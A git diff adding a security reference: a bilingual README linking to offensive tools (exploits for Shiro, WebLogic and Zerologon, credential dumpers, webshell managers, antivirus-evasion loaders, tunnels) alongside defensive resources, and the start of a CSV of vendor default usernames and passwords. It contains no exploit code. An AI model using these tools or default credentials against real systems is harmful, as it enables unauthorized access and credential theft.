https://github.com/amaz1ngday/fastjson-exp +- GitLab: + - CVE-2021-22205: https://github.com/Al1ex/CVE-2021-22205/ +- Nacos: + - NacosRce: https://github.com/c0olw/NacosRce/ + - nacosleak: https://github.com/a1phaboy/nacosleak + - nacosScan:https://github.com/Whoopsunix/nacosScan + - NacosExploitGUI: https://github.com/charonlight/NacosExploitGUI +- Nps: + - nps-auth-bypass: https://github.com/carr0t2/nps-auth-bypass +- Java: + - jdwp-shellifier: python2 https://github.com/IOActive/jdwp-shellifier + - jdwp-shellifier: https://github.com/Lz1y/jdwp-shellifier +- Shiro: + - Shiro rememberMe Decrypt: https://vulsee.com/tools/shiroDe/shiroDecrypt.html + - shiro_attack: https://github.com/j1anFen/shiro_attack + - shiro_rce_tool: https://github.com/wyzxxz/shiro_rce_tool + - ShiroExploit: https://github.com/feihong-cs/ShiroExploit-Deprecated + - ShiroExp: https://github.com/safe6Sec/ShiroExp + - shiro_key: https://github.com/yanm1e/shiro_key 1k+ +- Struts: + - Struts2VulsTools: https://github.com/shack2/Struts2VulsTools +- Spring: + - SpringBoot-Scan: https://github.com/AabyssZG/SpringBoot-Scan + - SpringBootVulExploit: https://github.com/LandGrey/SpringBootVulExploit + - CVE-2022-22963 https://github.com/mamba-2021/EXP-POC/tree/main/Spring-cloud-function-SpEL-RCE + - CVE-2022-22947/CVE-2022-22963: https://github.com/savior-only/Spring_All_Reachable + - swagger-exp: https://github.com/lijiejie/swagger-exp + - jasypt decrypt: https://www.devglan.com/online-tools/jasypt-online-encryption-decryption +- Heapdump: + - heapdump_tool: https://github.com/wyzxxz/heapdump_tool + - Memory Analyzer: https://eclipse.dev/mat/previousReleases.php + - JDumpSpider:https://github.com/whwlsfb/JDumpSpider +- Tomcat: + - CVE-2020-1938: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi + - ClassHound: https://github.com/LandGrey/ClassHound +- Thinkphp: + - ThinkphpGUI: https://github.com/Lotus6/ThinkphpGUI + - thinkphp_gui_tools: https://github.com/bewhale/thinkphp_gui_tools +- Weblogic: + - WeblogicTool: https://github.com/KimJun1010/WeblogicTool + - WeblogicScan: https://github.com/dr0op/WeblogicScan + - WeblogicScan: https://github.com/rabbitmask/WeblogicScan + - weblogicScanner: https://github.com/0xn0ne/weblogicScanner + - weblogic-framework: https://github.com/sv3nbeast/weblogic-framework + - CVE-2020-14882: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py +- WebSocket: + - wscat: https://github.com/websockets/wscat +- vCenter: + - VcenterKiller: https://github.com/Schira4396/VcenterKiller + - VcenterKit:https://github.com/W01fh4cker/VcenterKit +- Zookeeper: + - ZooInspector: https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip + - apache-zookeeper: https://archive.apache.org/dist/zookeeper/zookeeper-3.5.6/ zkCli.sh + +## 渗透测试 _Penertation Testing_ + +### 综合工具 _Nice Tools_ + +- Yakit: https://github.com/yaklang/yakit +- Burpsuite: https://portswigger.net/burp +- Burpsuite Extensions: + - https://github.com/gh0stkey/HaE highlighter and extractor + - https://github.com/whwlsfb/Log4j2Scan for Log4j + - https://github.com/F6JO/RouteVulScan route vulnerable scanning + - https://github.com/whwlsfb/BurpCrypto support AES/RSA/DES/ExecJs + - https://github.com/bit4woo/domain_hunter_pro domain hunter + +### _Web_ + +- XSS: + - XSS Chop: https://xsschop.chaitin.cn/demo/ + - XSS/CSRF: https://evilcos.me/lab/xssor/ + - HTML5 Security Cheatsheet: https://html5sec.org/ +- Local File Inclusion: + - https://github.com/hansmach1ne/lfimap + - https://github.com/mzfr/liffy +- SSRF: + - https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet payloads + +### _DNSLog_ + +- Online: + - http://ceye.io/ + - http://dnslog.cn/ + - https://dig.pm/ +- Alphalog: dns/http/rmi/ldap https://github.com/AlphabugX/Alphalog +- DNS rebinding: https://lock.cmpxchg8b.com/rebinder.html +- DNSLog-GO: https://github.com/lanyi1998/DNSlog-GO + +### _Payload and Bypass_ + +- Bypass HTTP 40X errors: + - https://github.com/yunemse48/403bypasser + - https://github.com/lobuhi/byp4xx + - https://github.com/Dheerajmadhukar/4-ZERO-3 + - https://github.com/devploit/nomore403 +- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings +- java.lang.Runtime.exec() Payload: https://payloads.net/Runtime.exec/ +- PHP Generic Gadget Chains: https://github.com/ambionics/phpggc PHP unserialize() payloads +- PHPFuck: https://github.com/splitline/PHPFuck +- JSFuck: http://www.jsfuck.com/ +- JavaScript Deobfuscator and Unpacker: https://lelinhtinh.github.io/de4js/ +- Gopherus: + - https://github.com/tarunkant/Gopherus py2 + - https://github.com/Esonhugh/Gopherus3 py3 +- CVE-2021-44228-PoC-log4j-bypass-words: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words + +## 内网渗透 _Red Teaming_ + +### 凭证获取 _Credential Access_ + +- Credential Dumping: + - LaZagne: https://github.com/AlessandroZ/LaZagne + - WirelessKeyView: https://www.nirsoft.net/utils/wireless_key.html + - Windows credential manager: https://www.nirsoft.net/utils/credentials_file_view.html + - Pillager: https://github.com/qwqdanchun/Pillager/ + - searchall: https://github.com/Naturehi666/searchall + - pypykatz: https://github.com/skelsec/pypykatz mimikatz implementation in pure python +- Local Enumeration: + - HackBrowserData: https://github.com/moonD4rk/HackBrowserData + - BrowserGhost: https://github.com/QAX-A-Team/BrowserGhost + - chrome: http://www.nirsoft.net/utils/chromepass.html + - firefox: https://github.com/unode/firefox_decrypt + - foxmail: https://securityxploded.com/foxmail-password-decryptor.php + - mobaxterm: https://github.com/HyperSine/how-does-MobaXterm-encrypt-password + - navicat: https://github.com/Zhuoyuan1/navicat_password_decrypt + - navicat: https://github.com/HyperSine/how-does-navicat-encrypt-password + - sunflower: https://github.com/wafinfo/Sunflower_get_Password + - FindToDeskPass: https://github.com/yangliukk/FindToDeskPass + - sundeskQ: sunflower & todesk https://github.com/milu001/sundeskQ + - securreCRT: https://github.com/depau/shcrt + - xshell: + - https://github.com/HyperSine/how-does-Xmanager-encrypt-password version<7.0 + - https://github.com/RowTeam/SharpDecryptPwd decrypt locally + - https://github.com/JDArmy/SharpXDecrypt +- NTLM Cracking: + - NetNTLMv1: https://ntlmv1.com/ online + - LM + NTLM hashes and corresponding plaintext passwords: + - https://openwall.info/wiki/_media/john/pw-fake-nt.gz 3107 + - https://openwall.info/wiki/_media/john/pw-fake-nt100k.gz 100k + +### 后渗透 _Post Exploitation_ + +- NICE TOOLS: + - https://github.com/rapid7/metasploit-framework + - https://github.com/byt3bl33d3r/CrackMapExec + - https://github.com/Pennyw0rth/NetExec + - https://github.com/fortra/impacket AV Evasion based on wmiexec.py + - https://github.com/XiaoliChan/wmiexec-Pro + - https://docs.microsoft.com/en-us/sysinternals/downloads/pstools + - https://github.com/GhostPack/Rubeus + - https://github.com/Kevin-Robertson/Powermad + - https://github.com/PowerShellMafia/PowerSploit + - https://github.com/k8gege/Ladon + - https://github.com/samratashok/nishang for powershell +- netspy: https://github.com/shmilylty/netspy intranet segment spy +- LOLBAS: https://github.com/LOLBAS-Project/LOLBAS binaries and scripts for Windows +- GTFOBins: https://gtfobins.github.io/  binaries for Unix +- Responder: + - https://github.com/lgandx/Responder + - https://github.com/lgandx/Responder-Windows + +### 权限提升 _Privilege Escalation_ + +- Linux Local Enumeration: + - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite + - https://github.com/mostaphabahadou/postenum + - https://github.com/rebootuser/LinEnum + - https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh + - https://github.com/DominicBreuker/pspy +- Windows Local Enumeration: + - https://github.com/S3cur3Th1sSh1t/WinPwn + - https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASbat/winPEAS.bat + - https://github.com/S3cur3Th1sSh1t/PowerSharpPack + - https://github.com/Flangvik/SharpCollection + - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 + - https://github.com/dafthack/DomainPasswordSpray + - https://github.com/dafthack/MailSniper +- Windows Exploits: + - https://github.com/AonCyberLabs/Windows-Exploit-Suggester + - https://github.com/SecWiki/windows-kernel-exploits + - https://github.com/Al1ex/WindowsElevation + - https://i.hacking8.com/tiquan/ online + - https://github.com/BeichenDream/BadPotato/ + - https://github.com/giuliano108/SeBackupPrivilege + - https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeBackupPrivilege.ps1 +- Linux Exploits: + - https://github.com/The-Z-Labs/linux-exploit-suggester + - https://github.com/InteliSecureLabs/Linux_Exploit_Suggester +- Database Exploits: + - https://github.com/Hel10-Web/Databasetools + +### 权限维持 _Persistence_ + +- Webshell Collection: + - https://github.com/tennc/webshell + - https://github.com/novysodope/RMI_Inj_MemShell + - https://github.com/ce-automne/TomcatMemShell + - https://github.com/veo/wsMemShell +- Webshell Management: + - https://github.com/rebeyond/Behinder + - https://github.com/BeichenDream/Godzilla + - https://github.com/shack2/skyscorpion +- Webshell Bypass: + - https://github.com/AabyssZG/WebShell-Bypass-Guide + - http://bypass.tidesec.com/web/ + - https://github.com/cseroad/Webshell_Generate +- Reverse Shell Management: + - https://github.com/WangYihang/Platypus + - https://github.com/calebstewart/pwncat python 3.9+ + +### 防御规避 _Defense Evasion_ + +- Linux: + - libprocesshider: https://github.com/gianlucaborello/libprocesshider hide a process under Linux using the ld preloader + - Linux Kernel Hacking: https://github.com/xcellerator/linux_kernel_hacking + - tasklist /svc && ps -aux: https://tasklist.ffffffff0x.com/ +- Windows: + - bypassAV: https://github.com/pureqh/bypassAV + - GolangBypassAV: https://github.com/safe6Sec/GolangBypassAV + - BypassAntiVirus: https://github.com/TideSec/BypassAntiVirus + - AV_Evasion_Tool: https://github.com/1y0n/AV_Evasion_Tool + - shellcodeloader: https://github.com/knownsec/shellcodeloader + - tasklist/systeminfo: https://www.shentoushi.top/av/av.php + +### 内网穿透 _Proxy_ + +- frp: https://github.com/fatedier/frp +- frpModify: https://github.com/uknowsec/frpModify +- Stowaway: https://github.com/ph4ntonn/Stowaway +- Neo-reGeorg: https://github.com/L-codes/Neo-reGeorg +- nps: https://github.com/ehang-io/nps +- reGeorg: https://github.com/sensepost/reGeorg +- rakshasa: https://github.com/Mob2003/rakshasa +- Viper: https://github.com/FunnyWolf/Viper +- Proxifier: https://www.proxifier.com/ +- Proxychains: https://github.com/haad/proxychains +- iodine: https://github.com/yarrick/iodine dns tunnel +- dnscat2: https://github.com/iagox86/dnscat2 dns tunnel +- DNS-Shell: https://github.com/sensepost/DNS-Shell dns tunnel +- icmpsh: l https://github.com/bdamele/icmpsh icmp tunne + +### 端口转发 _Port Forwarding_ + +- tcptunnel: https://github.com/vakuum/tcptunnel intranet → dmz → attacker + +### 辅助工具 _Auxiliary Tools_ + +- Cobaltstrike Extensions: + - Awesome CobaltStrike: https://github.com/zer0yu/Awesome-CobaltStrike + - Erebus: https://github.com/DeEpinGh0st/Erebus + - LSTAR: https://github.com/lintstar/LSTAR + - ElevateKit: https://github.com/rsmudge/ElevateKit + - C2ReverseProxy: https://github.com/Daybr4ak/C2ReverseProxy + - pystinger: https://github.com/FunnyWolf/pystinger +- OPSEC Tools: + - https://privacy.sexy/ enforce privacy & security best-practices on Windows, macOS and Linux. + - https://transfer.sh/ anonymous file transfer + +## 域渗透 _Active Directory Penetration_ + +### 开源资源 _Resources_ + +- AD attack&defense mindmaps: https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg +- Game of active directory: https://github.com/Orange-Cyberdefense/GOAD +- Windows/AD cheatsheet: https://wadcoms.github.io/ + +### 域内信息收集 Collection and Discovery + +- BloodHound: + - https://github.com/SpecterOps/BloodHound + - https://github.com/dirkjanm/BloodHound.py + - https://github.com/BloodHoundAD/SharpHound + - https://github.com/CompassSecurity/BloodHoundQueries +- https://github.com/lzzbb/Adinfo +- https://github.com/wh0amitz/SharpADWS via Active Directory Web Services (ADWS) protocol +- https://github.com/FalconForceTeam/SOAPHound via Active Directory Web Services (ADWS) protocol +- https://github.com/shmilylty/SharpHostInfo + +### 域内已知漏洞 _Known Vulnerabilities_ + +- noPac: CVE-2021-42278 / CVE-2021-42287 + - https://github.com/Ridter/noPac + - https://github.com/Amulab/advul +- Zerologon CVE-2020-1472: + - https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py + - https://github.com/XiaoliChan/zerologon-Shot + - https://github.com/dirkjanm/CVE-2020-1472 + - https://github.com/Potato-py/Potato/tree/03c3551e4770db440b27b0a48fc02b0a38a1cf04/exp/cve/CVE-2020-1472 + - https://github.com/risksense/zerologon + - https://github.com/StarfireLab/AutoZerologon +- Exchange ProxyLogon & ProxyShell: + - https://github.com/dirkjanm/privexchange/ + - https://github.com/Jumbo-WJB/PTH_Exchange + - https://github.com/hausec/ProxyLogon +- Printnightmare CVE-2021-34527 / CVE-2021-1675: + - https://github.com/cube0x0/CVE-2021-1675 + - https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 + - https://github.com/calebstewart/CVE-2021-1675 + +### 域内渗透方式 Methodology + +- kerbrute: https://github.com/ropnop/kerbrute +- DCSync: https://github.com/n00py/DCSync +- Coerce & NTLM relay: + - PetitPotam: https://github.com/topotam/PetitPotam + - PrinterBug: https://github.com/leechristensen/SpoolSample + - DFSCoerce: https://github.com/Wh04m1001/DFSCoerce + - ShadowCoerce: https://github.com/ShutdownRepo/ShadowCoerce + - PrivExchange: https://github.com/dirkjanm/privexchange/ + - Coercer: https://github.com/p0dalirius/Coercer + - cannon: https://github.com/Amulab/cannon + +### ADCS _Active Directory Certificate Services_ + +- Active Directory Certificate Services(AD CS) enumeration and abuse: + - Certify: https://github.com/GhostPack/Certify + - Certipy: https://github.com/ly4k/Certipy + - certi: https://github.com/zer1t0/certi + - PKINITtools: https://github.com/dirkjanm/PKINITtools + - ADCSPwn: https://github.com/bats3c/ADCSPwn +- PassTheCert: https://github.com/AlmondOffSec/PassTheCert + +## 安全防护 _Defensive Security_ + +### 内存马查杀 _Memshell Detection_ + +- https://github.com/LandGrey/copagent for java +- https://github.com/alibaba/arthas for java +- https://github.com/c0ny1/java-memshell-scanner for java +- https://github.com/yzddmr6/ASP.NET-Memshell-Scanner for aspx + +### Webshell 查杀 _Webshell Detection_ + +- https://webshellchop.chaitin.cn/demo/ +- https://n.shellpub.com/ +- http://www.shellpub.com + +### 攻击研判 _Blue Teaming_ + +- CobaltStrike Decrypt: https://github.com/5ime/CS_Decrypt +- BlueTeamTools: https://github.com/abc123info/BlueTeamTools +- IP Logger: https://iplogger.org/ log and track IP Addresses + +### 基线加固 _Enforcement_ + +- https://github.com/AV1080p/Benchmarks +- https://github.com/xiaoyunjie/Shell_Script +- https://github.com/grayddq/GScan +- https://github.com/ppabc/security_check +- https://github.com/T0xst/linux + +### 勒索病毒 _Ransomware_ + +- Search Engine: + - 360: http://lesuobingdu.360.cn + - 腾讯: https://guanjia.qq.com/pr/ls + - 启明星辰: https://lesuo.venuseye.com.cn + - 奇安信: https://lesuobingdu.qianxin.com + - 深信服: https://edr.sangfor.com.cn/#/information/ransom_search +- Decryption Tools: + - 腾讯: https://habo.qq.com/tool + - 金山毒霸: http://www.duba.net/dbt/wannacry.html + - 瑞星: http://it.rising.com.cn/fanglesuo/index.html + - 卡巴斯基: https://noransom.kaspersky.com/ + - https://www.nomoreransom.org/zh/index.html + - https://id-ransomware.malwarehunterteam.com + - https://www.avast.com/ransomware-decryption-tools + - https://www.emsisoft.com/en/ransomware-decryption/ + - https://github.com/jiansiting/Decryption-Tools + +### 开源蜜罐 _Open-Source Honeypot_ + +- awesome-honeypots: https://github.com/paralax/awesome-honeypots list of honeypot resources +- HFish: https://github.com/hacklcx/HFish +- conpot: https://github.com/mushorg/conpot for ICS +- MysqlHoneypot: https://github.com/qigpig/MysqlHoneypot via MySQL honeypot to get wechat ID +- Ehoney: https://github.com/seccome/Ehoney + +## 云安全 _Cloud Security_ + +### 开源资源 _Resources_ + +- TeamsSix: + - https://github.com/teamssix/awesome-cloud-security + - https://wiki.teamssix.com/ +- lzCloudSecurity: + - https://github.com/EvilAnne/lzCloudSecurity + - https://lzcloudsecurity.gitbook.io/yun-an-quan-gong-fang-ru-men/ +- HackTricks Cloud: https://cloud.hacktricks.xyz/ +- Awesome-CloudSec-Labs: https://github.com/iknowjason/Awesome-CloudSec-Labs +- Aliyun OpenAPI: https://next.api.aliyun.com/api/ +- Cloud Native Landscape: https://landscape.cncf.io/ +- Cloud Vulnerabilities and Security Issues Database: https://www.cloudvulndb.org/ + +### 云安全矩阵 _Cloud Threat Matrix_ + +- https://attack.mitre.org/matrices/enterprise/cloud/ +- https://cloudsec.huoxian.cn/ +- https://cloudsec.tencent.com/home/ +- https://www.microsoft.com/en-us/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ threat matrix for Kubernetes + +### 云漏洞环境 _Vulnerable Cloud Environments_ + +- Metarget: https://github.com/Metarget/metarget +- TerraformGoat: https://github.com/HXSecurity/TerraformGoat +- Kubernetes Goat: https://github.com/madhuakula/kubernetes-goat +- Attack Defense: https://attackdefense.pentesteracademy.com/listing?labtype=cloud-services&subtype=cloud-services-amazon-s3 +- AWSGoat: https://github.com/ine-labs/AWSGoat +- CloudGoat: https://github.com/RhinoSecurityLabs/cloudgoat + +### 云服务 _Cloud Services_ + +- Management Tools : + - https://yun.cloudbility.com/ 云存储图形化管理平台 + - https://github.com/aliyun/aliyun-cli for aliyun oss + - https://github.com/aliyun/oss-browser via aliyun cli + - https://github.com/TencentCloud/cosbrowser for tencentcloud cos + - https://github.com/TencentCloud/tencentcloud-cli via tencentcloud cli + - https://support.huaweicloud.com/browsertg-obs/obs_03_1003.html for huaweicloud obs + - https://www.ctyun.cn/document/10000101/10006768 for ctyun obs + - https://www.ctyun.cn/document/10306929/10132519 for ctyun media + - https://docsv4.qingcloud.com/user_guide/development_docs/cli/install/install/ via qingcloud cli + - https://github.com/qiniu/kodo-browser for qiniu oss + +>Top3 Cloud Serive Proider: +> - Amazon Web Services (AWS) / Microsoft Azure /Google Cloud Platform (GCP) +> - Alibaba Cloud / Tencent Cloud / Huawei Cloud + +- AK/SK Exploit(): + - https://github.com/trufflesecurity/trufflehog find, verify, and analyze leaked credentials + - https://wiki.teamssix.com/cf/ exploit framework v0.5.0(open source) + - https://github.com/CloudExplorer-Dev/CloudExplorer-Lite fit2cloud CloudExplorer + - https://github.com/mrknow001/aliyun-accesskey-Tools + - https://github.com/iiiusky/alicloud-tools + - https://github.com/NS-Sp4ce/AliyunAccessKeyTools + - https://github.com/freeFV/Tencent_Yun_tools + - https://github.com/libaibaia/cloudSec web tool for top3 + aws/qiniu + - https://github.com/wyzxxz/aksk_tool for top3 + aws/ucloud/jd/baidu/qiniu + - https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools leak detection + - https://github.com/dark-kingA/cloudTools top3 + ucloud + +### 云原生 _Cloud Native_ + +- NICE TOOLS: + - https://github.com/HummerRisk/HummerRisk open source cloud-native security platform +- Docker: + - https://github.com/wagoodman/dive exploring each layer in a docker image + - https://github.com/docker/docker-bench-security docker bench for security + - https://github.com/eliasgranderubio/dagda/ static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats + - https://github.com/teamssix/container-escape-check container escape check + - https://github.com/brant-ruan/awesome-container-escape container escape check + - https://github.com/cdk-team/CDK pentest toolkit + - https://github.com/chaitin/veinmind-tools pentest toolkit +- Kubernetes: + - https://kubernetes.io/docs/tasks/tools/ + - https://github.com/etcd-io/etcd + - https://github.com/derailed/k9s kubernetes cli + - https://github.com/lightspin-tech/red-kube redteam k8s adversary emulation based on kubectl + - https://github.com/DataDog/KubeHound tool for building kubernetes attack paths + - https://github.com/inguardians/peirates kubernetes pentest tool + +## AI 安全 _AI Security_ + +### AI 安全矩阵 _AI Threat Matrix_ + +- Nsfocus: https://aiss.nsfocus.com/ + +## 移动端安全 _Mobile Security_ + +### 小程序 _Mini Program_ + +- ~~[wxappUnpacker: https://github.com/xuedingmiaojun/wxappUnpacker]~~ +- https://github.com/Cherrison/CrackMinApp +- https://github.com/mrknow001/API-Explorer ak/sk for X +- https://github.com/eeeeeeeeee-code/e0e1-wx + +### _APK_ + +- https://github.com/kelvinBen/AppInfoScanner +- https://github.com/iBotPeaches/Apktool + +### _SessionKey_ + +- https://github.com/mrknow001/wx_sessionkey_decrypt +- https://github.com/mrknow001/BurpAppletPentester + +## 逆向工程 _Reverse engineering_ + +- NICE TOOLS: + - https://github.com/BlackINT3/OpenArk anti-rootkit + - https://pythonarsenal.com/ reverse toolkit +- ELF/EXE: + - IDA: https://hex-rays.com/ida-pro/ + - x64DBG: https://x64dbg.com/ + - Ollydbg: https://www.ollydbg.de/ + - ExeinfoPE: https://github.com/ExeinfoASL/ASL + - PEiD: https://www.aldeid.com/wiki/PEiD + - UPX: https://github.com/upx/upx +- Java: + - jadx: https://github.com/skylot/jadx + - JEB: https://www.pnfsoftware.com/ + - GDA: https://github.com/charles2gan/GDA-android-reversing-Tool +- Python: + - https://www.py2exe.org/ py->exe + - https://github.com/pyinstaller/pyinstaller py->exe + - https://github.com/matiasb/unpy2exe exe->pyc + - https://github.com/extremecoders-re/pyinstxtractor exe->pyc + - https://github.com/rocky/python-uncompyle6/ pyc->py +- Rust: + - https://github.com/cha5126568/rust-reversing-helper +- Go: + - https://github.com/strazzere/golang_loader_assist + - https://github.com/sibears/IDAGolangHelper +- .NET: + - https://www.jetbrains.com/zh-cn/decompiler/ + - https://github.com/dnSpy/dnSpy + +## 提高生产力的辅助工具 + +### _Shell_ + +- https://github.com/ohmyzsh/ohmyzsh command line enhancement for zsh +- https://github.com/chrisant996/clink command line enhancement for cmd.exe +- https://github.com/Eugeny/tabby for Windows +- https://github.com/warpdotdev/Warp for Mac +- https://github.com/tomnomnom/anew tool for adding new lines to files, skipping duplicates +- https://github.com/jlevy/the-art-of-command-line +- Linux command line: + - https://github.com/jaywcjlove/linux-command online + - https://github.com/chenjiandongx/pls go ver. + - https://github.com/chenjiandongx/how python ver. +- https://explainshell.com/ explain shell command +- https://github.com/BurntSushi/ripgrep a line-oriented search tool(faster) + +### _Chrome Extensions_ + +- ZeroOmega: https://github.com/zero-peak/ZeroOmega proxy switchyOmega for manifest v3 +- serp-analyzer: https://leadscloud.github.io/serp-analyzer/ show domain/IP +- FindSomething: https://github.com/ResidualLaugh/FindSomething find something in source code or javascript +- Hack Bar:https://github.com/0140454/hackbar +- Wappalyzer: https://www.wappalyzer.com/ identify technologies on websites +- EditThisCookie:https://www.editthiscookie.com/ +- Cookie-Editor:https://github.com/Moustachauve/cookie-editor +- Disable JavaScript: https://github.com/dpacassi/disable-javascript +- Heimdallr: https://github.com/Ghr07h/Heimdallr for honeypot +- anti-honeypot:https://github.com/cnrstar/anti-honeypot for honeypot +- immersive-translate: https://github.com/immersive-translate/immersive-translate/ translator +- relingo: https://cn.relingo.net/en/ translator +- json-formatter: https://github.com/callumlocke/json-formatter +- markdown-viewer: https://github.com/simov/markdown-viewer + +### _Infrastructure_ + +- f8x: https://github.com/ffffffff0x/f8x red/blue team environment automation deployment tool +- cloudreve: https://github.com/cloudreve/Cloudreve self-hosted file management system with muilt-cloud support +- updog: https://github.com/sc0tfree/updog uploading and downloading via HTTP/S +- mattermost: https://github.com/mattermost/mattermost +- rocketchat: https://github.com/RocketChat/Rocket.Chat +- codimd: https://github.com/hackmdio/codimd +- hedgedoc: https://github.com/hedgedoc/hedgedoc + +### _LLM_ + +#### 开源资源 _Open-Source Resources_ + +- https://github.com/Hannibal046/Awesome-LLM +- https://github.com/HqWu-HITCS/Awesome-Chinese-LLM + +#### 提示词 _Prompts_ + +- https://github.com/f/awesome-chatgpt-prompts +- https://github.com/PlexPt/awesome-chatgpt-prompts-zh + +#### 部署 _Deployment_ + +- huggingface: https://huggingface.co/ 大型语言模型下载(AI 界 Github ) +- ollama: https://github.com/ollama/ollama 启动并运行大型语言模型 +- open-webui: https://github.com/open-webui/open-webui 离线 WebUI +- enchanted: https://github.com/AugustDev/enchanted 将私有模型部署为应用程序 + +如果你想通过 ollama 在**本地**快速部署 LLM,可以参考这套技术栈: + +- 运行大型语言模型:ollama +- 运行大型语言模型并部署 WebUI:ollama + open-webui +- 运行大型语言模型并部署应用程序:ollama + enchanted +- 运行大型语言模型并与本地编辑器集成(例如 Obsidian):ollama + copilot(Obsidian 插件) +- 运行大型语言模型并与本地代码编辑器集成(例如 Vscode): ollama + continue(Vscode 插件) +- ... + +_to be continued..._ + +## 提高生产力的使用姿势 + +### 如何通过 .bat 使用 alias + +创建 alias.bat,激活 conda 虚拟环境,在隔离环境下运行程序或工具。双击 alias.bat,重启 cmd,配置生效。 + +``` +@echo off +:: Software +@DOSKEY ida64=activate base$t"D:\CTFTools\Cracking\IDA_7.7\ida64.exe" + +:: Tools +@DOSKEY fscan=cd /d D:\Software\HackTools\fscan$tactivate security$tdir +``` + +将 alias.bat 配置为开机自启动: + +- 注册表进入 `计算机\HKEY_CURRENT_USER\Software\Microsoft\Command Processor`; +- 创建字符串值 `autorun`,赋值为 alias.bat 所在位置,例如 `D: \Software\alias.bat`; +- 重启系统,配置生效。 + +### 如何通过.bat 激活 conda 并运行 py + +创建 run.bat,激活 conda 环境并运行 python 程序: + +``` +call D:\YOUR_PATH\Anaconda\Scripts\activate.bat D:\YOUR_PATH\Anaconda\ +call conda activate YOUR_ENV +cd D:\YOUR_WORKDIR +python YOUR_PYTHON_FILE.py +pause +``` + +### 如何优化原生终端 + +Windows 通过 tabby + clink 优化原生终端,实现命令自动补全、vps ssh/ftp/sftp、输出日志记录等功能: + +- tabby: https://github.com/Eugeny/tabby +- clink: https://github.com/chrisant996/clink + +MacOS 通过 warp + ohmyzsh 优化原生终端,warp 自带命令自动补全,引入“块”概念,提供了更现代化的编程体验(Modern UX and Text Editing): + +- warp: https://github.com/warpdotdev/Warp +- ohmyzsh: https://github.com/ohmyzsh/ohmyzsh + +### 如何解决终端中文乱码 + +注册表进入 `计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor`,创建字符串值 `autorun`,赋值为 `chcp 65001`。 diff --git a/cheatsheets/DefaultCreds-Cheat-Sheet.csv b/cheatsheets/DefaultCreds-Cheat-Sheet.csv new file mode 100644 index 0000000..7a45f3d --- /dev/null +++ b/cheatsheets/DefaultCreds-Cheat-Sheet.csv @@ -0,0 +1,3469 @@ +productvendor,username,password +3COM,admin,1234admin +3COM,admin,admin +3COM,Admin,Admin +3COM,admin, +3COM,admin,comcomcom +3COM,Administrator,admin +3COM,Administrator, +3COM,admin,password +3COM,admin,synnet +3COM,adminttd,adminttd +3COM,,12345 +3COM,,1234admin +3COM,,admin +3COM,,ANYCOM +3COM,, +3COM,,comcomcom +3COM,,ILMI +3COM,,PASSWORD +3COM,debug,synnet +3COM,defug,synnet +3COM,manager,manager +3COM,monitor,monitor +3COM,read,synnet +3COM,recover,recover +3COM,recovery,recovery +3COM,root,!root +3COM,security,security +3COM (ssh),admin,admin +3COM,tech, +3COM,tech,tech +3COM,Type User: FORCE, +3COM,User,Password +3COM,write,synnet +3M,VOL-0215, +3M,volition, +3M,volition,volition +3ware,Administrator,3ware +Aastra,admin,33aastra +Accelerated Networks,sysadm,anicust +ACCTON,admin, +ACCTON,,0 +ACCTON,,0000 +ACCTON,manager,manager +ACCTON,monitor,monitor +ACCTON,__super,(caclulated) +accton t-online,,0 +Aceex,admin, +acer,acer,acer +Acer,, +actiontec,admin,admin +Actiontec,admin,password +Actiontec,, +ActiveMQ (general),admin,admin +ActiveMQ (general),, +acti (web),admin,12345 +acti (web),Admin,12345 +acti (web),admin,123456 +acti (web),Admin,123456 +Adaptec,Administrator,adaptec +ADC Kentrox,,secret +AdComplete.com,Admin1,Admin1 +Addon,admin,admin +AddPac Technology,root,router +ADIC,admin,password +ADIC,admin,secure +ADIP,adip,admin +ADIP,adip,consul +ADIP,adip,insta +Adobe,admin,admin +Adobe,anonymous,anonymous +Adobe,aparker@geometrixx.info,aparker +Adobe,author,author +Adobe,jdoe@geometrixx.info,jdoe +Adobe,replication-receiver, +Adobe,replication-receiver,replication-receiver +Adobe,vgnadmin,vgnadmin +ADP,sysadmin,master +ADT,,2580 +Adtech,root,ax400 +Adtran,admin,password +ADTRAN,admin,password +adtran,,adtran +Adtran,,adtran +adtran,, +adtran,,Password +Advanced Integration,,Advance +Advantek Networks,admin, +Aethra,admin,password +AIRAYA Corp,Airaya,Airaya +Airlink,,admin +AirLink Plus,,admin +Aironet,, +AirTies RT-210,admin,admin +Airway,,0000 +Akkadian Console Server,admin,admin +Akkadian Contact Manager,gdadmin,admin +Akkadian Provisioning Manager,akkadianuser,akkadianpassword +Akkadian Provisioning Manager,PMEAdmin,PMEAdmin +Akkadian Site Builder,SBAdmin,SBAdmin123 +Aladdin,root,kn1TG7psLu +Alcatel,adfexc,adfexc +Alcatel,admin,switch +Alcatel,at4400,at4400 +Alcatel,,1064 +Alcatel,,151515 +Alcatel,,admin +Alcatel,, +Alcatel,client,client +Alcatel,dhs3mt,dhs3mt +Alcatel,dhs3pms,dhs3pms +Alcatel,diag,switch +Alcatel,ftp_admi,kilo1987 +Alcatel,ftp_inst,pbxk1064 +Alcatel,ftp_nmc,tuxalize +Alcatel,ftp_oper,help1954 +Alcatel,halt,tlah +Alcatel,install,llatsni +Alcatel,kermit,kermit +Alcatel,mtch,mtch +Alcatel,mtcl, +Alcatel,mtcl,mtcl +Alcatel,root,letacla +Alcatel,root,permit +Alcatel,SUPERUSER,ANS#150 +Alcatel,superuser,superuser +Alcatel Thomson,admin,admin +Alien Technology,alien,alien 